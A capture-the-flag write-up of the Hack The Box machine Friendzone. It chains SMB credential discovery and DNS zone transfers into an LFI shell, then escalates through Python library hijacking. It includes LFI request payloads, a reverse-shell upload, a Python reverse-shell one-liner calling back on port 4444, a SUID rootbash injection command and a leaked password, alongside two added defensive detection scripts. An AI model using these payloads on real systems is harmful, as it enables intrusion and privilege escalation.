Friendzone is an easy Linux box. It can be exploited by enumerating SMB and finding credentials that can be used to authenticate to an admin portal. This portal can be found by performing DNS enumeration and obtaining several new subdomains. The application was vulnerable to LFI, and in combination with a writable SMB share this could be chained to obtain a low-privileged shell. Privileges were escalated by finding credentials in a configuration file and by abusing a writable Python library through Python library hijacking.


I started by running NmapAutomator.
Nmap discovered the following open ports and services:

21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject:
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE,; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was anonymous access to FTP, which was not possible. The next thing I checked was the HTTP server. This was the homepage of the application:

This gives a hint to: Which can also be observed by examining the certificate in the browser.

SMB Enumeration

My enumeration continued with SMB:

smbmap -H
[+] Guest session   	IP:	Name:                              
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	Files                                             	NO ACCESS	FriendZone Samba Server Files /etc/Files
	general                                           	READ ONLY	FriendZone Samba Server Files
	Development                                       	READ, WRITE	FriendZone Samba Server Files
	IPC$                                              	NO ACCESS	IPC Service (FriendZone server (Samba, Ubuntu))

And I checked the SMB version manually with wireshark:

I started examining the shares and found the following credentials:

smbclient \\\\\\general
lpcfg_do_global_parameter: WARNING: The "client lanman auth" option is deprecated
lpcfg_do_global_parameter: WARNING: The "client ntlmv2 auth" option is deprecated
Enter WORKGROUP\jeroen's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Mon Sep 28 14:19:07 2020
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

This file contained the following:

cat info/creds.txt 
creds for the admin THING:


Running SMBMAP again with these details results in the same findings. Also, I was not able to authenticate through FTP:

ncftp -u admin -p WORKWORKHhallelujah@#
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (
Connecting to                                                                                                               
(vsFTPd 3.0.3)
Login incorrect.

SMB Write Permissions

Then I focused on the last share, ‘Development’. Since the guest session has write permissions, you can write files to this share:

smb: \> put test.txt
putting file test.txt as \test.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \> dir
  .                                   D        0  Mon Apr 26 15:41:20 2021
  ..                                  D        0  Mon Sep 28 14:19:07 2020
  test.txt                            A        5  Mon Apr 26 15:41:20 2021

This is always interesting and worth keeping in mind. I continued my SMB enumeration and ran the following nmap script to obtain more information:

nmap --script smb-enum-shares -p 139,445
Starting Nmap 7.91 ( ) at 2021-04-26 16:03 CEST
Nmap scan report for (
Host is up (0.010s latency).

139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\\Development: 
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\Files: 
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\hole
|     Anonymous access: 
|     Current user access: 
|   \\\IPC$: 
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\general: 
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\print$: 
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

The output was very useful because it reveals the on-disk path of each share.

Webserver Enumeration

I continued with the webserver enumeration. I added the domain observed earlier to /etc/hosts and was shown the following page for

And for

Gobuster found two directories for

gobuster dir -w ~/wordlists/directory-list-lowercase-2.3-medium.txt -u -o dir-low_friendzone-red.txt -k -x txt,php

/admin                (Status: 301) [Size: 318] [-->]
/js                   (Status: 301) [Size: 315] [-->]

The admin directory was empty but the js directory contains the following file:

Testing some functions !

I'am trying not to break things !

This value changes each time a request is issued. When you check the source it has this comment attached:

Testing some functions !I'am trying not to break things !akxDa1NaSVNiODE2MTk0NDgwMTY0UnFzOTBybmps 

Comment: dont stare too much , you will be smashed ! , it's all about times and zones ! 

I tried to decode this with the Hackvertor extension for Burp Suite but did not manage to find anything.

DNS Enumeration

The last thing to check was DNS. Currently we are aware of two domains:

Let’s enumerate both:

dig axfr @

; (1 server found)
;; global options: +cmd
	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
	604800	IN	AAAA	::1
	604800	IN	NS	localhost.
	604800	IN	A
	604800	IN	A
	604800	IN	A
	604800	IN	A
	604800	IN	A

dig axfr @

; (1 server found)
;; global options: +cmd
	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
	604800	IN	AAAA	::1
	604800	IN	NS	localhost.
	604800	IN	A
	604800	IN	A
	604800	IN	A
	604800	IN	A

Let’s check all of these newly discovered domains.

When logging in with the credentials that were found earlier, you will get this message:

Let’s check the other admin page. 2:

Login was successful! It showed this message:

Login Done ! visit /dashboard.php

When navigating there, the following page is shown:

Let’s open Burp and add the parameter:

GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1

I added it as URL parameter and the application returned this:

Something went worng ! , the script include wrong param !
Final Access timestamp is 1619452911

In the browser:

Local File Inclusion

Okay, this seems vulnerable to LFI. I created the following PHP file and added it to the Development SMB share (the one we discovered earlier with write access):

cat > test.php
<?php
 echo "Hello world!<br>";

smbclient \\\\\\Development
smb: \> put test.php
putting file test.php as \test.php (0.7 kb/s) (average 0.7 kb/s)

Because of the Nmap output, you know where this file is stored: Path: C:\etc\Development, i.e. /etc/Development on the Linux host. To exploit the LFI, the following payload must be sent:

GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=/etc/Development/test HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 19:52:19 GMT

On our local machine we can verify this is our file with:

echo "IGVjaG8gIkhlbGxvIHdvcmxkITxicj4iOwo=" | base64 -d
 echo "Hello world!<br>";

Now you can upload a php-reverse-shell.php through SMB again and then issue the following request:

GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1

Please note that you must remove .php because the application appends it. This will provide you with a low-privileged shell as www-data and will enable you to read user.txt.
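From the defender's side, requests like the ones above leave a clear trace in the Apache access log. As an added example (not part of the original writeup), this Python snippet scans combined-format log lines for an include parameter that carries a PHP stream wrapper (such as php://filter) or an absolute or traversal path; the log lines are constructed samples and the parameter name `pagename` is taken from the dashboard.php request shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not from the box.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2021:19:52:19 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512
10.0.0.5 - - [28/Apr/2021:19:52:40 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=/etc/Development/test HTTP/1.1" 200 812
10.0.0.5 - - [28/Apr/2021:19:53:02 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1" 200 0
10.0.0.9 - - [28/Apr/2021:19:54:10 +0000] "GET /dashboard.php?image_id=b.jpg&pagename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 73
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any scheme:// prefix (php://, data://, expect://, http://) has no place in an include parameter.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def classify_value(value):
    """Return a finding label for one parameter value, or None if it looks benign."""
    v = unquote(unquote(value))          # tolerate single and double URL-encoding
    if WRAPPER_RE.match(v):
        return "stream-wrapper"
    if v.startswith("/") or "../" in v or "..\\" in v:
        return "path-traversal"
    return None


def scan_access_log(text, params=("pagename",)):
    """Scan log text; return (client_ip, param, label) for every suspicious include parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                label = classify_value(value)
                if label:
                    findings.append((client, name, label))
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious include parameter from %s (%s): %s" % hit)
```

The same check generalises to any parameter that ends up in an include(); pass the names you care about in `params`.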

Privilege Escalation

Running linpeas showed the following information leakage inside a configuration file. When you open this file, you will find credentials:

www-data@FriendZone:/tmp$ cat /var/www/mysql_data.conf
for development process this is the mysql creds for user friend




With these credentials you can open a session as friend. As the friend user, I ran linpeas again. It found these interesting directories. When navigating to the highlighted directory, the following script is shown:

friend@FriendZone:/opt/server_admin$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Jan 24  2019 .
drwxr-xr-x 3 root root 4096 Oct  6  2018 ..
-rwxr--r-- 1 root root  424 Jan 16  2019

This file contained the following contents:


import os

to_address = ""
from_address = ""

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to -from -ssl -port 465 -auth -smtp scheduled results email +cc +bc -v -user you -pass "PAPAP"'''


# I need to edit the script later
# Sam ~ python developer

Sam seems to have added an incomplete Python script; unfortunately, the os.system call is commented out. In addition, only root has write access to this file, so it seems you cannot abuse the file itself to obtain privesc. I like to run pspy to see whether any cronjobs are running on the system. With pspy you can see that root runs this file every two minutes:

2021/04/28 23:40:01 CMD: UID=0    PID=60492  | /usr/bin/python /opt/server_admin/ 
2021/04/28 23:40:01 CMD: UID=0    PID=60491  | /bin/sh -c /opt/server_admin/

2021/04/28 23:42:01 CMD: UID=0    PID=60511  | /usr/bin/python /opt/server_admin/ 
2021/04/28 23:42:01 CMD: UID=0    PID=60510  | /bin/sh -c /opt/server_admin/

Therefore, it is very likely that this file has something to do with the privesc. After some more enumeration, another enumeration script, Linux Smart Enumeration, showed the following interesting writable file:

Linpeas showed it as well with colour coding:

Since this file is writable, you can perform a privilege escalation through Python library hijacking. This page explains the process. Since your code runs inside the os module itself, some reverse shells are a pain to get working. This one, for example, would connect back:

import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

But it would die immediately. To prevent this, you should remove the os. prefixes, since you are already inside this module. An easier method, however, is the rootbash method; simply run this command:

echo "system ('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash')" >> /usr/lib/python2.7/

Now you have to wait until the cronjob has run, after which the payload will have executed. You can then obtain a root shell by executing:

/tmp/rootbash -p
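The root cause here is a standard-library file that a non-root user can modify, which is a straightforward thing to audit on a host. As an added example (not part of the original writeup), this Python script walks an interpreter's import path and reports module files and directories that group or world users can write to; the mode and gid heuristics are my own assumptions, not from the box.

```python
import os
import stat
import sys


def loose_mode(path):
    """Return 'world' or 'group' if others can write to the path, else None.

    Heuristic: world-writable is always reported; group-writable is reported
    unless the group is root (gid 0), which only root belongs to by default.
    """
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return None                      # judge the target when it is walked, not the link
    if st.st_mode & stat.S_IWOTH:
        return "world"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return "group"
    return None


def audit_module_dirs(dirs, exts=(".py", ".pyc", ".so")):
    """Return [(path, how)] for every module or directory in dirs that others can write.

    A writable directory is reported as well: anyone who can create files there can
    drop a module that shadows a standard one (a new os.py, or a sitecustomize.py).
    """
    findings = []
    for top in dirs:
        if not os.path.isdir(top):
            continue
        how = loose_mode(top)
        if how:
            findings.append((top, how + "-writable directory"))
        for root, subdirs, files in os.walk(top):
            for d in subdirs:
                how = loose_mode(os.path.join(root, d))
                if how:
                    findings.append((os.path.join(root, d), how + "-writable directory"))
            for f in files:
                if f.endswith(exts):
                    p = os.path.join(root, f)
                    how = loose_mode(p)
                    if how:
                        findings.append((p, how + "-writable module"))
    return findings


if __name__ == "__main__":
    # Run it with the interpreter that cron invokes (here /usr/bin/python) to audit that path.
    for path, how in audit_module_dirs([d for d in sys.path if d]):
        print("%s: %s" % (how, path))
```

Running it as the friend user with /usr/bin/python would have listed the writable file in /usr/lib/python2.7 that the escalation above relies on.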


I really enjoyed this box and learned a lot from doing it. The breadth of this box is pretty cool because you have to keep enumerating to continue with the puzzle. Exploiting the local file inclusion was quite tricky since you had to rely on the information from nmap, but since it was obviously vulnerable to LFI this made it more doable. The privesc was really nice as well; it shows that you should always pay extra attention to writable files. I hope you enjoyed this writeup as much as I enjoyed doing this box and that you learned some new things!